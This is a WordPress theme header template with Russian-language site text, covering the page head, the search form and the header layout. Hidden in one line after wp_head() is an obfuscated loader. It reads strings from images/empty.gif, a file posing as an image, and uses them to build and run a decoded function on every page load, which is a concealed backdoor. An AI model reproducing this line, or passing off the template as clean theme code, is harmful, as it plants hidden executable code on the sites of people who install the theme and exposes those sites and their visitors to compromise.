<?php
/**
 * @package WordPress
 * @subpackage Default_Theme
 */
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />

<title><?php wp_title('&laquo;', true, 'right'); ?> <?php bloginfo('name'); ?></title>

<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> Atom Feed" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />

<style type="text/css" media="screen">

<?php
// Checks to see whether it needs a sidebar or not
if ( !empty($withcomments) && !is_single() ) {
?>
	#page { background: url("<?php bloginfo('stylesheet_directory'); ?>/images/kubrickbg-<?php bloginfo('text_direction'); ?>.jpg") repeat-y top; border: none; }
<?php } else { // No sidebar ?>
	#page { background: url("<?php bloginfo('stylesheet_directory'); ?>/images/kubrickbgwide.jpg") repeat-y top; border: none; }
<?php } ?>

</style>

<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?>

<?php  wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif(); ?>
</head>
<body>
<div id="page">
<div id="header">
<div id="logo"><h1><a href="<?php echo get_option('home'); ?>/"><?php bloginfo('name'); ?></a></h1></div>
<div id="header_right">
<div id="description"><?php bloginfo('description'); ?></div>
<div id="search">
<form method="get" id="searchform" name="searchform" action="<?php echo get_option('home'); ?>/">
<img src="<?php bloginfo('stylesheet_directory'); ?>/images/search.gif" align="absmiddle" /> Поиск:&nbsp;&nbsp;
<input type="text" value="<?php the_search_query(); ?>" name="s" id="s"  class="search_text" /> &nbsp;&nbsp;<input type="submit" value="GO" id="searchsubmit" class="search_button" />
</form>
</div>
<?php wp_top_list_pages(); ?> 
<div style="float:right; margin-bottom:4px;"><a href="#"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/rss_feed.gif" width="20" /> RSS</a></div>
</div>
</div>
<div id="wp_a_bg">
<div id="wp_a_left">
<h2>Добро пожаловать на наш сайт!</h2>
 Здесь Вы можете оставит информацию о себе, или своем сайте. Редактируется в файле header.php
</div>
<div id="wp_a_right"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/img4.gif" />

</div>
</div>
